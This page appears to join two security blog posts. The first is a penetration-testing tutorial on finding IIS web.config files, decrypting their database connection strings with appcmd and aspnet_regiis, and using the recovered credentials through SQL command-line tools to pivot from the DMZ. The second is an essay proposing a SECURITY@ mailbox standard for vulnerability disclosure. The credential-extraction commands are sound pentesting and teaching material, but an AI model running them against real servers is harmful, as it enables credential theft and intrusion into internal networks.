If you enjoy these, be sure to make it out to Secure360 this year as Karl will be presenting as well as co-instructing a full-day class on “An Introduction to Penetration Testing” along with NetSPI Principal Consultant Scott Sutherland.
To learn more about Secure360, Karl’s presentations, or information on how to sign up for the training please visit the pages below:
From the perspective of a penetration tester, it would be nice if every vulnerability provided a direct path to high-value systems on the internal network. However, the reality is that we aren’t always that lucky, and sometimes we land on an application server in the DMZ network first. In this blog I’ll cover how to use native IIS tools to recover encrypted database passwords from web.config files and leverage them to break into the internal network from the DMZ. This should be interesting to penetration testers, developers, and system administrators trying to gain a better understanding of the value and limitations of passwords encrypted in IIS configuration files. Below is an overview of what will be covered.
Web.config is an XML configuration file that is used to control ASP.NET servers, applications, and pages. As an attacker, web.config files are incredibly valuable because they often contain connection strings that can be used to access databases on the internal network. Usually holes are poked through the DMZ firewall to allow the application server to reach backend database servers, so connecting through the firewall boundary usually isn't a problem. Once the attacker has successfully connected to a database server on the internal network, it is often possible to escalate to the operating system level and, in a few short steps, obtain Domain Admin privileges. Below I'll cover how to find and decrypt connection strings in web.config files.
Finding web.config Files
Before the connection strings can be extracted, the web.config files will need to be located. They can be found in multiple locations, but are typically located in the web root of each application directory. For example: "c:\inetpub\wwwroot\MyApp\web.config". As it turns out, IIS application directories are not always in the inetpub directory, and may not be located on the C drive at all. Thankfully there is a native command that can help. The appcmd.exe command is installed along with IIS 7 and can search, view, and modify IIS configurations (assuming you're an admin). So we can run the command below to find the application directories we are looking for.
%windir%\system32\inetsrv\appcmd.exe list vdir
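On a typical install the output lists each virtual directory along with its physical path; the lines below are an illustrative sketch (the site names and paths are made up, and match the examples used later in this post):

```
VDIR "Default Web Site/" (physicalPath:%SystemDrive%\inetpub\wwwroot)
VDIR "MyTestSite/" (physicalPath:C:\MyTestSite)
```

The physicalPath values are what we care about, since they tell us where to start hunting for web.config files.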
From there it’s possible to quickly recursively search the directories for web.config files with the command below:
dir /s /b C:\MyTestSite | find /I "web.config"
Finding Connection Strings in the web.config
Now that we know where the web.config files are, we can start searching for connection strings. Luckily they are pretty easy to find because they are contained within the “connectionstrings” XML tag. Below is a basic example of what an unencrypted connection string might look like in a web.config file.
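The fragment below is a sketch of what a typical unencrypted entry might look like; the name, server, and credentials are made up for illustration:

```xml
<connectionStrings>
  <add name="MyAppConnection"
       connectionString="Data Source=PRDSRV1;Initial Catalog=MyAppDb;User ID=s1admin;Password=s1password"
       providerName="System.Data.SqlClient" />
</connectionStrings>
```

Anything inside the "connectionStrings" tag that includes a "User ID" and "Password" in cleartext is ready to use as-is.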
Appcmd can be used to streamline the recovery of connection strings if they are not encrypted. Below is a little script example:
for /f "delims=" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list site /text:name') DO %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings
Decrypting Connection Strings in the web.config
From an attacker's perspective it's nice if connection strings are not encrypted. The reality is that it's becoming more and more common for the strings to be encrypted (which is good for admins). Encrypting web.config files is useful for protecting connection strings when they have been backed up. However, once an attacker has administrative access to an IIS server, it is possible to use the same methods the developers use to decrypt the connection strings. Aspnet_regiis.exe is another native tool, installed by default with the .NET Framework on IIS servers. In this example we are going to use it to decrypt our web.config. Below are the basic steps.
1. Copy the web.config out of the application directory.
copy "c:\inetpub\wwwroot\MyApp\web.config" c:\temp
2. View the file to verify the connection strings are encrypted. Encrypted connection strings will appear inside "CipherData" and "CipherValue" tags within the "connectionStrings" section.
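An encrypted section will look roughly like the sketch below (the cipher text is truncated and illustrative; the provider name will vary depending on how the developers protected the section):

```xml
<connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
  <EncryptedData Type="http://www.w3.org/2001/04/xmlenc#Element"
                 xmlns="http://www.w3.org/2001/04/xmlenc#">
    <CipherData>
      <CipherValue>WXo2YLDL...snip...mUF8yb=</CipherValue>
    </CipherData>
  </EncryptedData>
</connectionStrings>
```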
3. Decrypt the connection string in the web.config with aspnet_regiis.exe. Make sure to use the most recent version found in the Framework folder. The newest version is typically backwards compatible and should be able to decrypt connection strings that were encrypted with an older version.
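Assuming the file from step 1 was copied to c:\temp, the decryption command looks something like the line below. The "-pdf" option decrypts the named section of the web.config found in the given physical directory; the Framework version folder (and Framework vs. Framework64) will vary by system:

```
%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "c:\temp"
```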
4. Recover the unencrypted connection strings from the web.config file. The cleartext connection strings should look like the example shown in the last section.
To automate the entire process, I've written a small PowerShell script called "get-webconfig.ps1" with Antti Rantasaari. It can be downloaded from GitHub HERE. It's also been added to the Posh-SecMod PowerShell project owned by Carlos Perez. The toolkit has a ton of handy scripts for all sorts of things – go check it out at https://github.com/darkoperator/Posh-SecMod. Ok, back on track…
Don’t forget to run as an administrator or system. Below is an example of the output. It will show the username, password, database server, IIS virtual directory, full path to the web.config, and indicate if it was found encrypted.
PS C:\> get-webconfig.ps1 | Format-Table -AutoSize

user    pass       dbserv                vdir               path                          encr
----    ----       ------                ----               ----                          ----
s1admin s1password 192.168.1.101\server1 C:\App1            C:\App1\web.config            No
s1user  s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No
s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\test\web.config       No
s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\web.config            Yes
s3user  s3password 192.168.1.103\server3 D:\App3            D:\App3\web.config            No
Connecting to the Backend Database
Now that we have decrypted the database connection strings let’s use them. In most cases, web applications hosted on an IIS server connect to a Microsoft SQL Server on the backend. In some cases the command line SQL client tools are already installed on the IIS server. Those can be leveraged to access the database without too much effort. Below are some basic examples.
isql.exe -S PRDSRV1 -U sa -P Password1 -Q "SELECT name FROM master..sysdatabases"
osql.exe -S PRDSRV1 -U sa -P Password1 -Q "SELECT name FROM master..sysdatabases"
sqlcmd.exe -S PRDSRV1 -U sa -P Password1 -Q "SELECT name FROM master..sysdatabases"
If command line SQL clients are not on the server, then PowerShell can be used to accomplish the same goal. Antti Rantasaari made a great web shell that will do all of this for you. He also wrote a nice little blog to go with it that you can find here. Below is a basic example showing how to list all of the databases on the remote server if you want to experiment on your own. However, during a real attack you would most likely use the xp_cmdshell and xp_dirtree stored procedures to pivot into the internal network. Antti and I put together a presentation a while back that covers those topics in more detail. You can download it from SlideShare here.
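As a rough sketch of the PowerShell route, the snippet below lists the databases using the .NET System.Data.SqlClient classes. The server name and credentials are placeholders reused from the earlier examples – swap in a recovered connection string:

```powershell
# Build a connection from a recovered connection string (placeholder values shown)
$conn = New-Object System.Data.SqlClient.SqlConnection
$conn.ConnectionString = "Server=PRDSRV1;Database=master;User ID=sa;Password=Password1;"
$conn.Open()

# Run the same query used with the command line clients above
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT name FROM master..sysdatabases"
$reader = $cmd.ExecuteReader()
while ($reader.Read()) { $reader["name"] }

$conn.Close()
```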
Encrypting passwords in the web.config does help reduce risk related to read-only attacks and access to backup files. However, if an attacker is able to gain administrative access to a system, they will be able to use administrative tools or Windows APIs such as crypt32.dll to decrypt protected passwords. As a result, attackers may be able to break out of the DMZ and into the internal network. That is why it is very important to also make sure that all accounts are configured with least privilege, proper network zone isolation is enforced, and sensitive accounts are being audited. Hopefully this was helpful. Have fun and hack responsibly!
I present you with RFC2142, please take a minute to skim through it for a little context. This RFC aggregates all of the recommended mailbox names that network and computer operators should set up depending on what public services they offer (You did set up, and continue to monitor, important mailboxes like postmaster, abuse, and so on, right?). The idea is that if someone has a mail issue, they can just email POSTMASTER@domain.tld; if there is an issue with the website, they send it to WEBMASTER@domain.tld. Having these predefined mailboxes takes all the thought out of the process, and saves people from having to pick up the phone or hunt around the website for a contact form – they just send the message and get on with their day. People have become lazy about these best practices, so this blog is also meant to raise awareness of them.
So how does this relate to security, you ask? One of the dumb problems in the security industry is that there isn't a standard way to disclose vulnerabilities to vendors or to network operators. Unless you have some sort of existing relationship with the company, or they go above and beyond in terms of security responsiveness (which is almost nobody), you start pitching your vulnerability disclosure into various e-mail boxes, snail-mail letters, voicemail boxes, etc. More often than not, the information doesn't make it to the right person, so you end up disclosing publicly. When the bad press happens to catch someone's attention, they get upset because you didn't tell them about the problem first. It's a lose-lose situation for everyone involved.
My suggestion is to resurrect good internet stewardship, and start standardizing on the SECURITY@domain.tld for vulnerability and security disclosure. The above RFC was written in 1997 and includes this mailbox under section 4 “NETWORK OPERATIONS MAILBOX NAMES,” so at least there is existing precedent for this naming convention. I suggest we expand the scope a little and use that mailbox for any security related topic. This can include, but is not limited to:
Vulnerabilities on a website
Vulnerabilities in software distributed by that company
Vulnerabilities in services offered by the company
Vulnerabilities on a public facing network or system that is maintained by that company
Publicly leaked information on websites like Pastebin
Sensitive documents blowing in the parking lot
What you do with the mailbox is up to you, but here are some ideas:
Have an employee check this box once in a while, and manually distribute the messages to those that need the information.
Create a secondary mailbox in Exchange that people can attach to and have your infosec department manage the mailbox.
Create a distribution group or mailing list with key members of your organization subscribed.
Have a ticketing system monitor the mailbox and create cases or tickets automagically when something comes in.
While we're talking about standardizing vulnerability disclosure, let's put together some high-level process objectives we could all strive to attain:
All messages received on SECURITY@domain.tld should send an auto-reply back to the user immediately thanking them for their submission, and include a URL to a page with more information about that company’s vulnerability process. (We could even standardize the URL, how about something like www.domain.tld/security/?)
Within no more than 7 calendar days, the vendor MUST send a response back to the vulnerability submitter. The response should contain a case or ticket number they can reference in the future and a means of communication to check up on the status of the vulnerability. This gives the vendor an opportunity to accept the vulnerability as legitimate and issue a case or ticket number, while dropping spam messages without assigning case numbers to bogus requests. If no ticket number is issued within that seven-day window, for any reason at all, the submitter is free to disclose publicly. If the submission is granted a ticket number, a three-month gag order and moratorium starts. The submitter should be reasonable and grant more time if the vendor gives a valid reason. For example, if a vulnerability were so widespread that the vendor would have to rewrite the entire application from the ground up, three months wouldn't be enough time.
Once the three months (or whatever time frame was agreed upon) are up, the vulnerability submitter is free to speak, blog, or tweet about the vulnerability as they see fit. Once the gag timer expires, the submitter's responsibility is terminated.
I realize this is a lofty idea that will get ignored, but I can dream. Thoughts, comments, and ideas on this are all greatly appreciated. Have you implemented something similar in your organization? Let me know in the comments how it worked for you.
UPDATE: Since the release of this blog, a couple of new standards have been published: ISO/IEC 29147 (vulnerability disclosure) and ISO/IEC 30111 (vulnerability handling processes) are now available for public consumption. I've not read either of these standards in full, but they should be reviewed by organizations when writing their vulnerability disclosure and handling policies.